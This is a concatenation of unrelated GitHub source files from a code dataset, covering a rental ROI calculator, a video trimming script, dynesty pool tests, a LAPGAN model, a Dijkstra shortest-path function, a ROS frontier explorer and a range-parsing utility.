int(rental) + int(storage) + int(misc) \n\n\tdef expenseInput(self):\n\t\ttaxes = input(\"How much did you spend on taxes? \")\n\t\tinsurance = input(\"How much did you spend on insurance? \")\n\t\telectric = input(\"How much did you spend on electric? \")\n\t\twater = input(\"How much did you spend on water? \")\n\t\tsewer = input(\"How much did you spend on sewer? \")\n\t\ttrash = input(\"How much did you spend on trash? \")\n\t\tgas = input(\"How much did you spend on gas? \")\n\t\tHOA = input(\"How much did you spend on HOA? \")\n\t\tlandscape = input(\"How much did you spend on landscape? \")\n\t\tvacancy = input(\"How much did you spend on vacancy? \")\n\t\trepairs = input(\"How much did you spend on repairs? \")\n\t\tCapEx = input(\"How much did you spend on CapEx? \")\n\t\tmortgage = input(\"How much did you spend on mortgage? \")\n\t\tprop_mgmt = input(\"How much did you spend on property management? \")\n\t\tself.expenses = int(taxes) + int(insurance) + int(electric) + int(water) + int(sewer) + int(trash) + int(gas) + int(HOA) + int(landscape) + int(vacancy) + int(repairs) + int(CapEx) + int(mortgage) + int(prop_mgmt)\n\n\n\tdef investmentInput(self):\n\t\tdown = input(\"How much did you spend on your down payment? \")\n\t\tclosing = input(\"How much did you spend on closing costs? 
\")\n\t\trehab = input(\"How much is your rehab budget? \")\n\t\tmisc = input(\"How much did you spend on misc investment items? \")\n\t\tself.investement = int(down) + int(closing) + int(rehab) + int(misc)\n\t\t\n\tdef cashFlowInput(self):\n\t\tmonthlyCashFlow = self.income - self.expenses\n\t\tannualCashFlow = monthlyCashFlow * 12\n\t\tprint(f\"Your monthly cash flow is {monthlyCashFlow}.\")\n\t\tprint(f\"Your annual cash flow is {annualCashFlow}.\")\n\t\t\n\tdef finalROI(self):\n\t\tmonthlyCashFlow = self.income - self.expenses\n\t\tannualCashFlow = monthlyCashFlow * 12\n\t\tROI = annualCashFlow / self.investement\n\t\tself.ROI += float(ROI*100)\n\t\tprint(f\"Your ROI is {self.ROI}%\")\n\n\nmyROI = CalculateROI()\n\ndef UserInput():\n\twhile True:\n\t\tresponse = input(\"What would you like to input? Income/Expense/Investment/Show/Quit \")\n\t\tif response.lower() == \"income\":\n\t\t\tmyROI.incomeInput()\n\t\telif response.lower() == 'expense':\n\t\t\tmyROI.expenseInput()\n\t\telif response == 'investment':\n\t\t\tmyROI.investmentInput() \n\t\telif response.lower() == \"show\":\n\t\t\tprint('You are all done!')\n\t\t\tmyROI.cashFlowInput()\n\t\t\tmyROI.finalROI()\n\t\telif response.lower() == 'quit':\n\t\t\tprint(\"Thank you, come again!\")\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"Invalid input, please try again.\")\n\n\nUserInput() ","repo_name":"coderklee/ROI_Calculator","sub_path":"ROI_Calculator.py","file_name":"ROI_Calculator.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1640852745","text":"import numpy as np\nimport cv2\nimport pandas as pd\nimport os\nfrom tqdm import tqdm\nimport math\n\n\n# the code for trimming a single video\ndef trim_vid(vid_path,output_vid,start,end):\n # define some video property \n cap = cv2.VideoCapture(vid_path)\n fps = cap.get(cv2.CAP_PROP_FPS)\n frame_width = int(cap.get(3))\n frame_height = int(cap.get(4))\n frame_num = int(cap.get(7))\n\n # calculate the frame to start and end \n start_frame = math.ceil(start * fps)\n end_frame = math.ceil(end * fps)\n\n # define out put video\n out = cv2.VideoWriter(output_vid,cv2.VideoWriter_fourcc(*'MJPG'), 30,\n (frame_width,frame_height))\n\n # set the video to start frame\n cap.set(1,start_frame)\n\n # load and save the frames\n for i in range(end_frame-start_frame):\n\n ret, frame = cap.read()\n if ret == True: \n out.write(frame)\n\n cap.release()\n out.release()\n\n cv2.destroyAllWindows()\n\n\n# main function for batch video trimming based on collected \"data_trim.csv\"\ndef trim_videos(df, trim_vid_dir=\"data/test_del\"):\n for index, row in tqdm(df.iterrows(),desc=\"Trimming videos... slow... 
please wait\"):\n # Please make sure column name is corrects(without extra space)\n vid_path = row.get(\"Video_Path\")\n vid_path = vid_path.replace('\"','')\n # get time stamp for FW and BW gait \n FW_Start, FW_End = row.get(\"FW_Start\"), row.get(\"FW_End\")\n BW_Start, BW_End = row.get(\"BW_Start\"), row.get(\"BW_End\")\n # define some output directories and video_name\n # get the current path and concat with the target path for trimmed videos\n data_dir = os.path.join(os.getcwd(), trim_vid_dir)\n # make folder for each subject\n subject_dir = os.path.join(data_dir, vid_path.split(\"\\\\\")[4])\n # try to make folder \n try:\n os.makedirs(subject_dir)\n # if already exist stop creating and continue\n except:\n pass\n # print if any video is in .MTS format\n if vid_path.endswith(\".MTS\"):\n print(vid_path)\n continue\n\n # double check that all data points' time stamp is valid\n if not pd.isnull(FW_Start) and not pd.isnull(FW_End):\n output_vid = os.path.join(subject_dir, row[\"Time\"]+\"_\"+row.get(\"ON or OFF\")+\"_\"+\"FW_\"+row[\"R1 or R2\"]+\"_\"+str(FW_Start)+\"_.avi\")\n if not os.path.exists(output_vid):\n trim_vid(vid_path,output_vid,FW_Start,FW_End)\n \n # double check that all data points' time stamp is valid\n if not pd.isnull(BW_Start) and not pd.isnull(BW_End):\n output_vid = os.path.join(subject_dir, row[\"Time\"]+\"_\"+row.get(\"ON or OFF\")+\"_\"+\"BW_\"+row[\"R1 or R2\"]+\"_\"+str(BW_Start)+\"_.avi\")\n if not os.path.exists(output_vid):\n trim_vid(vid_path,output_vid,BW_Start,BW_End)\n\nif __name__ == '__main__':\n # please replace with your own path\n trim_csv =r\"C:\\Users\\jingy\\Parkinson\\Codes\\csv\\data_trim.csv\"\n df= pd.read_csv(trim_csv)\n # please replace this path\n trim_videos(df, trim_vid_dir=\"data/test_del\")\n","repo_name":"jingyuanchan/Parkinson","sub_path":"multi_video_trim.py","file_name":"multi_video_trim.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44253583903","text":"import numpy as np\nimport pytest\nimport dynesty\nimport multiprocessing as mp\nimport dynesty.pool as dypool\nfrom utils import get_rstate, get_printing\n\"\"\"\nRun a series of basic tests to check whether anything huge is broken.\n\n\"\"\"\n\nnlive = 1000\nprinting = get_printing()\n\nndim = 2\ngau_s = 0.01\n\n\ndef loglike_gau(x):\n return (-0.5 * np.log(2 * np.pi) * ndim - np.log(gau_s) * ndim -\n 0.5 * np.sum((x - 0.5)**2) / gau_s**2)\n\n\ndef prior_transform_gau(x):\n return x\n\n\n# EGGBOX\n# see 1306.2144\ndef loglike_egg(x):\n logl = ((2 + np.cos(x[0] / 2) * np.cos(x[1] / 2))**5)\n return logl\n\n\ndef prior_transform_egg(x):\n return x * 10 * np.pi\n\n\nLOGZ_TRUTH_GAU = 0\nLOGZ_TRUTH_EGG = 235.856\n\n\ndef terminator(pool):\n # Because of https://github.com/nedbat/coveragepy/issues/1310\n # I have to close join and can't fully rely on contexts that\n # do send SIGTERMS\n pool.close()\n pool.join()\n\n\ndef test_pool():\n # test pool on egg problem\n rstate = get_rstate()\n\n # i specify large queue_size here, otherwise it is too slow\n with dypool.Pool(2, loglike_egg, prior_transform_egg) as pool:\n sampler = dynesty.NestedSampler(pool.loglike,\n pool.prior_transform,\n ndim,\n nlive=nlive,\n pool=pool,\n queue_size=100,\n rstate=rstate)\n sampler.run_nested(dlogz=0.1, print_progress=printing)\n\n assert (abs(LOGZ_TRUTH_EGG - sampler.results['logz'][-1])\n < 5. 
* sampler.results['logzerr'][-1])\n terminator(pool)\n\n\ndef test_pool_x():\n # check without specifying queue_size\n rstate = get_rstate()\n\n with dypool.Pool(2, loglike_egg, prior_transform_egg) as pool:\n sampler = dynesty.NestedSampler(pool.loglike,\n pool.prior_transform,\n ndim,\n nlive=50,\n pool=pool,\n rstate=rstate)\n sampler.run_nested(print_progress=printing, maxiter=100)\n # not checking the results since I'm interrupting\n terminator(pool)\n\n\ndef test_pool_dynamic():\n # test pool on gau problem\n # i specify large queue_size here, otherwise it is too slow\n rstate = get_rstate()\n\n with dypool.Pool(2, loglike_gau, prior_transform_gau) as pool:\n sampler = dynesty.DynamicNestedSampler(pool.loglike,\n pool.prior_transform,\n ndim,\n nlive=nlive,\n pool=pool,\n queue_size=100,\n rstate=rstate)\n sampler.run_nested(dlogz_init=1, print_progress=printing)\n\n assert (abs(LOGZ_TRUTH_GAU - sampler.results['logz'][-1])\n < 5. * sampler.results['logzerr'][-1])\n terminator(pool)\n\n\ndef loglike_gau_args(x, y, z=None):\n return (-0.5 * np.log(2 * np.pi) * ndim - np.log(gau_s) * ndim -\n 0.5 * np.sum((x - 0.5)**2) / gau_s**2) + y + z\n\n\ndef prior_transform_gau_args(x, y, z=None):\n return x + y + z\n\n\ndef test_pool_args():\n # test pool on gau problem\n # i specify large queue_size here, otherwise it is too slow\n rstate = get_rstate()\n\n with dypool.Pool(2,\n loglike_gau_args,\n prior_transform_gau_args,\n logl_args=(0, ),\n ptform_args=(0, ),\n logl_kwargs=dict(z=0),\n ptform_kwargs=dict(z=0)) as pool:\n sampler = dynesty.DynamicNestedSampler(pool.loglike,\n pool.prior_transform,\n ndim,\n nlive=nlive,\n pool=pool,\n queue_size=100,\n rstate=rstate)\n sampler.run_nested(maxiter=300, print_progress=printing)\n\n assert (abs(LOGZ_TRUTH_GAU - sampler.results['logz'][-1])\n < 5. * sampler.results['logzerr'][-1])\n\n # to ensure we get coverage\n terminator(pool)\n\n\n@pytest.mark.parametrize('sample', ['slice', 'rwalk', 'rslice'])\ndef test_pool_samplers(sample):\n # this is to test how the samplers are dealing with queue_size>1\n rstate = get_rstate()\n\n with mp.Pool(2) as pool:\n sampler = dynesty.NestedSampler(loglike_gau,\n prior_transform_gau,\n ndim,\n nlive=nlive,\n sample=sample,\n pool=pool,\n queue_size=100,\n rstate=rstate)\n sampler.run_nested(print_progress=printing)\n assert (abs(LOGZ_TRUTH_GAU - sampler.results['logz'][-1])\n < 5. 
* sampler.results['logzerr'][-1])\n terminator(pool)\n\n\nPOOL_KW = ['prior_transform', 'loglikelihood', 'propose_point', 'update_bound']\n\n\n@pytest.mark.parametrize('func', POOL_KW)\ndef test_usepool(func):\n # test all the use_pool options, toggle them one by one\n rstate = get_rstate()\n use_pool = {}\n for k in POOL_KW:\n use_pool[k] = False\n use_pool[func] = True\n\n with mp.Pool(2) as pool:\n sampler = dynesty.DynamicNestedSampler(loglike_gau,\n prior_transform_gau,\n ndim,\n nlive=nlive,\n rstate=rstate,\n use_pool=use_pool,\n pool=pool,\n queue_size=100)\n sampler.run_nested(maxiter=10000, print_progress=printing)\n terminator(pool)\n","repo_name":"joshspeagle/dynesty","sub_path":"tests/test_pool.py","file_name":"test_pool.py","file_ext":"py","file_size_in_byte":6319,"program_lang":"python","lang":"en","doc_type":"code","stars":319,"dataset":"github-code","pt":"48"}
{"seq_id":"3543204606","text":"import tensorflow as tf\n\n\ntf.set_random_seed(777)\n\n\ndef conv2d(input_, filter_=64, k=5, s=1, activation=tf.nn.leaky_relu, pad='same', name=\"conv2d\"):\n with tf.variable_scope(name):\n return tf.layers.conv2d(inputs=input_,\n filters=filter_,\n kernel_size=k,\n strides=s,\n padding=pad,\n activation=activation,\n kernel_initializer=tf.contrib.layers.variance_scaling_initializer(),\n bias_initializer=tf.constant_initializer(0.),\n name=name)\n\n\n# In image_utils, up/down_sampling\ndef image_sampling(img, sampling_type='down'):\n shape = img.get_shape() # [batch, height, width, channels]\n\n if sampling_type == 'down':\n h = int(shape[1] // 2)\n w = int(shape[2] // 2)\n else: # 'up'\n h = int(shape[1] * 2)\n w = int(shape[2] * 2)\n\n return tf.image.resize_images(img, [h, w], tf.image.ResizeMethod.BILINEAR)\n\n\nclass LAPGAN:\n\n def __init__(self, s, batch_size=128, input_height=32, input_width=32, input_channel=3, n_classes=10,\n sample_num=10 * 10, sample_size=10,\n z_dim=100, gf_dim=64, df_dim=64, fc_unit=512):\n\n \"\"\"\n # General Settings\n :param s: TF Session\n :param batch_size: training batch size, default 128\n :param input_height: input image height, default 32\n :param input_width: input image width, default 32\n :param input_channel: input image channel, default 3 (RGB)\n :param n_classes: the number of classes, default 10\n - in case of CIFAR, image size is 32x32x3(HWC), classes are 10.\n\n # Output Settings\n :param sample_size: sample image size, default 10\n :param sample_num: the number of sample images, default 100\n\n # Model Settings\n :param z_dim: z noise dimension, default 100\n :param gf_dim: the number of generator filters, default 64\n :param df_dim: the number of discriminator filters, default 64\n :param fc_unit: the number of fully connected filters, default 512\n \"\"\"\n\n self.s = s\n self.batch_size = batch_size\n self.input_height = input_height\n self.input_width = input_width\n self.input_channel = input_channel\n self.n_classes = n_classes\n\n self.sample_size = sample_size\n self.sample_num = sample_num\n\n self.image_shape = [self.input_height, self.input_width, self.input_channel]\n\n self.z_dim = z_dim\n\n self.gf_dim = gf_dim\n self.df_dim = df_dim\n self.fc_unit = fc_unit\n\n # Placeholders\n self.y = tf.placeholder(tf.float32, shape=[None, self.n_classes], name='y-classes') # one_hot\n\n self.x1_fine = tf.placeholder(tf.float32,\n shape=[None, self.input_height, self.input_width, self.input_channel],\n name='x-images')\n self.x1_scaled = image_sampling(self.x1_fine, 'down')\n self.x1_coarse = image_sampling(self.x1_scaled, 'up')\n 
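# Laplacian residual: high-frequency detail lost by the down/up-sampling round trip\n 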
self.x1_diff = self.x1_fine - self.x1_coarse\n\n self.x2_fine = self.x1_scaled # [16, 16]\n self.x2_scaled = image_sampling(self.x2_fine, 'down')\n self.x2_coarse = image_sampling(self.x2_scaled, 'up')\n self.x2_diff = self.x2_fine - self.x2_coarse\n\n self.x3_fine = self.x2_scaled # [8, 8]\n\n self.z = []\n self.z_noises = [32 * 32, 16 * 16, self.z_dim]\n for i in range(3):\n self.z.append(tf.placeholder(tf.float32,\n shape=[None, self.z_noises[i]],\n name='z-noise_{0}'.format(i)))\n\n self.g = [] # generators\n self.g_loss = [] # generator losses\n\n self.d_reals = [] # discriminator_real logit\n self.d_fakes = [] # discriminator_fake logit\n self.d_reals_prob = [] # discriminator_real prob\n self.d_fakes_prob = [] # discriminator_fake prob\n self.d_loss = [] # discriminator_real losses\n\n # Training Options\n self.d_op = []\n self.g_op = []\n\n self.beta1 = 0.5\n self.beta2 = 0.9\n self.learning_rate = 8e-4\n self.lr = tf.train.exponential_decay(\n learning_rate=self.learning_rate,\n decay_rate=0.9,\n decay_steps=150,\n global_step=750,\n staircase=False,\n )\n\n self.saver = None\n self.merged = None\n self.writer = None\n\n self.bulid_lapgan() # build LAPGAN model\n\n def discriminator(self, x1, x2, y, scale=32, reuse=None):\n \"\"\"\n :param x1: image to discriminate\n :param x2: down-up sampling-ed images\n :param y: classes\n :param scale: image size\n :param reuse: variable re-use\n :return: logits\n \"\"\"\n\n assert (scale % 8 == 0) # 32, 16, 8\n\n with tf.variable_scope('discriminator_{0}'.format(scale), reuse=reuse):\n if scale == 8:\n x1 = tf.reshape(x1, [-1, scale * scale * 3])\n\n h = tf.concat([x1, y], axis=1)\n\n h = tf.layers.dense(h, self.fc_unit, activation=tf.nn.leaky_relu, name='d-fc-1')\n h = tf.layers.dropout(h, 0.5, name='d-dropout-1')\n h = tf.layers.dense(h, self.fc_unit // 2, activation=tf.nn.leaky_relu, name='d-fc-2')\n h = tf.layers.dropout(h, 0.5, name='d-dropout-2')\n h = tf.layers.dense(h, 1, name='d-fc-3')\n else:\n x = x1 + x2\n\n y = tf.layers.dense(y, scale * scale, activation=tf.nn.leaky_relu, name='d-fc-1')\n y = tf.reshape(y, [-1, scale, scale, 1])\n\n h = tf.concat([x, y], axis=3)\n\n h = conv2d(h, filter_=self.df_dim, pad='valid', name='d-conv-1')\n h = conv2d(h, filter_=self.df_dim, activation=None, pad='valid', name='d-conv-2')\n\n h = tf.layers.flatten(h)\n h = tf.nn.leaky_relu(h)\n h = tf.layers.dropout(h, 0.5, name='d-dropout-1')\n\n h = tf.layers.dense(h, 1, name='d-fc-2')\n\n return h\n\n def generator(self, x, y, z, scale=32, reuse=None):\n \"\"\"\n :param x: images to fake\n :param y: classes\n :param z: noise\n :param scale: image size\n :param reuse: variable re-use\n :return: logits\n \"\"\"\n\n assert(scale % 8 == 0) # 32, 16, 8\n\n with tf.variable_scope('generator_{0}'.format(scale), reuse=reuse):\n if scale == 8:\n h = tf.concat([z, y], axis=1)\n\n # FC Layers\n h = tf.layers.dense(h, self.fc_unit, activation=tf.nn.leaky_relu, name='g-fc-1')\n h = tf.layers.dropout(h, 0.5, name='g-dropout-1')\n h = tf.layers.dense(h, self.fc_unit // 2, activation=tf.nn.leaky_relu, name='g-fc-2')\n h = tf.layers.dropout(h, 0.5, name='g-dropout-2')\n h = tf.layers.dense(h, 3 * 8 * 8, name='g-fc-3')\n\n h = tf.reshape(h, [-1, 8, 8, 3])\n else:\n y = tf.layers.dense(y, scale * scale, name='g-fc-0')\n y = tf.reshape(y, [-1, scale, scale, 1])\n z = tf.reshape(z, [-1, scale, scale, 1])\n\n h = tf.concat([z, y, x], axis=3) # concat into 5 dims\n\n # Convolution Layers\n for idx in range(1, scale // 8 - 1):\n h = conv2d(h, filter_=self.gf_dim, 
name='g-deconv-{0}'.format(idx))\n\n h = conv2d(h, filter_=3, activation=None, name='g-deconv-{0}'.format(scale // 8))\n\n return h\n\n def bulid_lapgan(self):\n def sce_loss(x, y):\n return tf.nn.sigmoid_cross_entropy_with_logits(logits=x, labels=y)\n\n # Generator & Discriminator\n g1 = self.generator(x=self.x1_coarse, y=self.y, z=self.z[0], scale=32)\n d1_fake = self.discriminator(x1=g1, x2=self.x1_coarse, y=self.y, scale=32)\n d1_real = self.discriminator(x1=self.x1_diff, x2=self.x1_coarse, y=self.y, scale=32, reuse=True)\n\n g2 = self.generator(x=self.x2_coarse, y=self.y, z=self.z[1], scale=16)\n d2_fake = self.discriminator(x1=g2, x2=self.x2_coarse, y=self.y, scale=16)\n d2_real = self.discriminator(x1=self.x2_diff, x2=self.x2_coarse, y=self.y, scale=16, reuse=True)\n\n g3 = self.generator(x=None, y=self.y, z=self.z[2], scale=8)\n d3_fake = self.discriminator(x1=g3, x2=None, y=self.y, scale=8)\n d3_real = self.discriminator(x1=self.x3_fine, x2=None, y=self.y, scale=8, reuse=True)\n\n self.g = [g1, g2, g3]\n self.d_reals = [d1_real, d2_real, d3_real]\n self.d_fakes = [d1_fake, d2_fake, d3_fake]\n\n # Prob\n m_sigmoid = lambda x: tf.reduce_mean(tf.sigmoid(x))\n with tf.variable_scope('prob'):\n for i in range(len(self.g)):\n self.d_reals_prob.append(m_sigmoid(self.d_reals[i]))\n self.d_fakes_prob.append(m_sigmoid(self.d_fakes[i]))\n\n # Losses\n with tf.variable_scope('loss'):\n for i in range(len(self.g)):\n self.d_loss.append(tf.reduce_mean(sce_loss(self.d_reals[i], tf.ones_like(self.d_reals[i])) +\n sce_loss(self.d_fakes[i], tf.zeros_like(self.d_fakes[i])),\n name=\"d_loss_{0}\".format(i)))\n self.g_loss.append(tf.reduce_mean(sce_loss(self.d_fakes[i], tf.ones_like(self.d_fakes[i])),\n name=\"g_loss_{0}\".format(i)))\n\n # Summary\n for i in range(len(self.g)):\n # tf.summary.scalar('d_real_{0}'.format(i), self.d_reals[i])\n # tf.summary.scalar('d_fake_{0}'.format(i), self.d_fakes[i])\n tf.summary.scalar('d_real_prob_{0}'.format(i), self.d_reals_prob[i])\n tf.summary.scalar('d_fake_prob_{0}'.format(i), self.d_fakes_prob[i])\n tf.summary.scalar('d_loss_{0}'.format(i), self.d_loss[i])\n tf.summary.scalar('g_loss_{0}'.format(i), self.g_loss[i])\n\n tf.summary.histogram(\"z_{0}\".format(i), self.z[i])\n\n # tf.summary.image(\"g\", g1) # generated image from G model\n\n # Optimizer\n t_vars = tf.trainable_variables()\n for idx, i in enumerate([32, 16, 8]):\n self.d_op.append(tf.train.AdamOptimizer(learning_rate=self.learning_rate,\n beta1=self.beta1, beta2=self.beta2).\n minimize(loss=self.d_loss[idx],\n var_list=[v for v in t_vars if v.name.startswith('discriminator_{0}'.format(i))]))\n self.g_op.append(tf.train.AdamOptimizer(learning_rate=self.learning_rate,\n beta1=self.beta1, beta2=self.beta2).\n minimize(loss=self.g_loss[idx],\n var_list=[v for v in t_vars if v.name.startswith('generator_{0}'.format(i))]))\n\n # Merge summary\n self.merged = tf.summary.merge_all()\n\n # Model Saver\n self.saver = tf.train.Saver(max_to_keep=1)\n self.writer = tf.summary.FileWriter('./model/', self.s.graph)\n","repo_name":"Wedeueis/Projetos","sub_path":"Data Science/Deep Learning/GANs/LAPGAN/lapgan_model.py","file_name":"lapgan_model.py","file_ext":"py","file_size_in_byte":11432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38675825945","text":"import heapq\nfrom collections import namedtuple, defaultdict\n\nNode = namedtuple('Node', ['depth', 'index'])\ndisjoint = float('inf')\n\n\ndef AddAdjacent(heap, adjacency, node):\n row = 
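The LAPGAN record above trains each pyramid level on the residual between an image and its down-then-up-sampled copy (x1_diff = x1_fine - x1_coarse). A minimal NumPy sketch of that residual construction, separate from the TensorFlow graph; the 2x2 mean/nearest-neighbour resampling stands in for the bilinear resize used above, and the sizes are illustrative.

```python
import numpy as np

def downsample(img):
    # 2x2 block average, halving height and width
    h, w = img.shape
    return img.reshape(h // 2, 2, w // 2, 2).mean(axis=(1, 3))

def upsample(img):
    # nearest-neighbour doubling of height and width
    return img.repeat(2, axis=0).repeat(2, axis=1)

img = np.random.rand(32, 32)
coarse = upsample(downsample(img))  # low-frequency content (x1_coarse above)
diff = img - coarse                 # residual the level-1 generator models (x1_diff)
print(diff.shape, np.abs(diff).mean())
```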
node.index\n for col in range(len(adjacency[row])):\n if adjacency[row][col] == disjoint:\n continue\n depth = node.depth + adjacency[row][col]\n heapq.heappush(heap, Node(depth=depth, index=col))\n\n\ndef FindShortestDistanceBetween(adjacency, a, b):\n visited = defaultdict(lambda: False)\n curr = Node(depth=0, index=a)\n heap = [curr]\n\n while curr.index != b and heap:\n curr = heapq.heappop(heap)\n if visited[curr.index]:\n continue\n visited[curr.index] = True\n AddAdjacent(heap, adjacency, curr)\n if curr.index == b:\n # return the distance carried by the popped node; b is a plain index and has no .depth\n return curr.depth\n return disjoint\n","repo_name":"slcjordan/dijkstra_example","sub_path":"dijkstras.py","file_name":"dijkstras.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5076579855","text":"#!/usr/bin/env python\nimport rospy\nimport sys\nfrom map import Map\nfrom edge import Edge\nfrom nav_msgs.srv import GetPlan, GetMap\nfrom nav_msgs.msg import GridCells, OccupancyGrid, Path\nfrom geometry_msgs.msg import Point, Pose, PoseStamped\nfrom priority_queue import PriorityQueue\nfrom std_msgs.msg import Bool\nimport tf\nfrom tf.transformations import euler_from_quaternion\n\nclass Explorer:\n\n def __init__(self):\n \"\"\"\n Class constructor\n \"\"\"\n ### Initialize node, name it 'nav'\n rospy.init_node('explorer')\n # publishers for nav goals, frontier visualization, and explorer state\n self.go=rospy.Publisher('/move_base_simple/goal', PoseStamped)\n self.frontier = rospy.Publisher('/path_planner/frontier',GridCells)\n self.centroids = rospy.Publisher('/path_planner/centroids',GridCells)\n self.exploring = rospy.Publisher('/explorer/state',Bool)\n self.request_map()\n\n # init tfListener\n self.tfListener=tf.TransformListener()\n\n # initializing variables needed\n self.px=0.0\n self.py=0.0\n self.pth=0.0\n\n rospy.sleep(1)\n\n def request_map(self):\n \"\"\"\n Requests the map from the map server.\n :return [OccupancyGrid] The grid if the service call was successful,\n None in case of error.\n \"\"\"\n rospy.loginfo('Explorer: Getting Map')\n rospy.wait_for_service('dynamic_map')\n service=rospy.ServiceProxy('dynamic_map',GetMap)\n self.map=Map(service().map)\n rospy.loginfo('Explorer: Got Map')\n\n def main(self):\n\n while True:\n rospy.loginfo('Explorer: Calculating Frontiers')\n\n c_space=self.map.c_space(2)\n # turn unknown map cells into edges\n frontiers=c_space.isolate_frontiers()\n # expand and shrink edges\n dilate=frontiers.morph(1)\n erode=dilate.morph(-1)\n if erode:\n rospy.loginfo('Explorer: Finished Exploring!')\n self.map=None\n break\n # publish edges to the frontier topic\n self.frontier.publish(erode.to_grid_cells())\n # turn eroded map into an Edge object list\n edges=erode.to_edges()\n # sort edges by size, largest first\n edges.sort(key=lambda e: 1/e.size)\n # check if centroid is reachable\n # send PoseStamped\n rospy.loginfo('Explorer: Sending Edge to Nav')\n rospy.loginfo(edges[0])\n\n\n\n self.go.publish(PoseStamped(pose=Pose(position=self.map.grid_to_world(edges[0].centroid))))\n rospy.loginfo('Explorer: Waiting for Robot to Drive')\n # wait for robot to reach the path goal\n rospy.wait_for_message('/explorer/reached',Bool)\n rospy.loginfo('Explorer: Loop Complete Restarting')\n # update map after movement:\n self.request_map()\n\n rospy.loginfo(\"Finished Exploring\")\n self.exploring.publish(Bool(False))\n\n\n def update_odometry(self):\n \"\"\"\n Updates the current pose of the robot.\n This method is a callback bound to a Subscriber.\n :param msg [Odometry] The current odometry information.\n \"\"\"\n 
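A quick sanity check for the corrected FindShortestDistanceBetween in the dijkstra record above; this snippet assumes the functions from that module are in scope, and the 4-node adjacency matrix is made up for the check.

```python
inf = float('inf')
adjacency = [
    [inf, 1,   4,   inf],
    [1,   inf, 2,   6],
    [4,   2,   inf, 3],
    [inf, 6,   3,   inf],
]
# Cheapest 0 -> 3 route is 0-1-2-3 with cost 1 + 2 + 3 = 6.
print(FindShortestDistanceBetween(adjacency, 0, 3))  # expected: 6
```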
(trans,rot)=self.tfListener.lookupTransform('/map','/base_footprint',rospy.Time(0))\n\n self.px=trans[0]\n self.py=trans[1]\n (roll , pitch , yaw) = euler_from_quaternion (rot)\n self.pth = yaw\n\n def run(self):\n \"\"\"\n Runs the node until Ctrl-C is pressed.\n \"\"\"\n rospy.spin()\n\nif __name__ == '__main__':\n planner=Explorer()\n planner.main()\n planner.run()\n","repo_name":"pratprem/RBE3002","sub_path":"rbe3002_lab3/src/nodes/explorer.py","file_name":"explorer.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3980308088","text":"import itertools\n\n\ndef parse_int_string(nputstr=\"\"):\n \"\"\"Return list of integers from comma separated ranges\n \n Modified from http://thoughtsbyclayg.blogspot.com/2008/10/parsing-list-\n of-numbers-in-python.html to return ranges in order specified, rather than\n sorting the entire resulting list\n \n >>> parse_int_string(\"1,4,9-12\")\n [1, 4, 9, 10, 11, 12]\n >>> parse_int_string(\"4,5,1,6\")\n [4, 5, 1, 6]\n >>> parse_int_string(\"4,6-8,1,5,2\")\n [4, 6, 7, 8, 1, 5, 2]\n \"\"\"\n selection = []\n error = \"\"\n invalid = set()\n # tokens are comma seperated values\n tokens = [x.strip() for x in nputstr.split(',')]\n for i in tokens:\n try:\n # typically tokens are plain old integers\n selection.append(int(i))\n except ValueError:\n # if not, then it might be a range\n try:\n token = [int(k.strip()) for k in i.split('-')]\n if len(token) > 1:\n token.sort()\n # we have items seperated by a dash\n # try to build a valid range\n first = token[0]\n last = token[len(token) - 1]\n for x in range(first, last + 1):\n selection.append(x)\n except ValueError:\n # not an int and not a range...\n invalid.add(i)\n # Report invalid tokens before returning valid selection\n if invalid:\n error = \"Invalid range: \" + \" \".join([str(i) for i in invalid])\n # ordered = list(selection)\n # ordered.sort()\n return selection, error\n\n\ndef int_list_to_string(values):\n # from http://stackoverflow.com/questions/4628333/converting-a-list-of-integers-into-range-in-python\n def ranges(i):\n for a, b in itertools.groupby(enumerate(i), lambda x_y: x_y[1] - x_y[0]):\n b = list(b)\n yield b[0][1], b[-1][1]\n\n items = []\n for r in ranges(values):\n if r[0] < r[1]:\n items.append(\"%d-%d\" % (r[0], r[1]))\n else:\n items.append(str(r[0]))\n return \",\".join(items)\n","repo_name":"NOAA-ORR-ERD/MapRoom","sub_path":"maproom/library/textparse.py","file_name":"textparse.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29253032935","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 9 13:58:17 2016\n\n@author: kuangyiyun\n\"\"\"\n\n#Exercise 8.1\nitem = ['a', 'b', 'c', 'd', 'e']\n\ndef chop(item):\n del item[0]\n del item[len(item)-1]\n\nchop(item)\nprint (item)\n\ndef middle(item):\n del item[0]\n del item[len(item)-1]\n return item\n \nitem = ['a', 'b', 'c', 'd', 'e']\nprint (middle(item))","repo_name":"kyyeve/Python-for-Informatics-Exercise","sub_path":"Exercise8_1.py","file_name":"Exercise8_1.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74574315025","text":"#!/usr/bin/python\n\n##########################################################################################\n# Program: crop_images.py\n# Purpose: In user's working directory with 
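int_list_to_string in the textparse record above leans on a classic itertools.groupby idiom: within a run of consecutive integers, value minus index is constant. A standalone illustration of just that grouping step, with an illustrative input list:

```python
import itertools

values = [1, 2, 3, 7, 9, 10]
# v - i is constant inside each run of consecutive integers,
# so grouping on that difference splits the list into runs.
for _, grp in itertools.groupby(enumerate(values), lambda p: p[1] - p[0]):
    run = [v for _, v in grp]
    print(run[0], run[-1])  # prints 1 3, then 7 7, then 9 10
```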
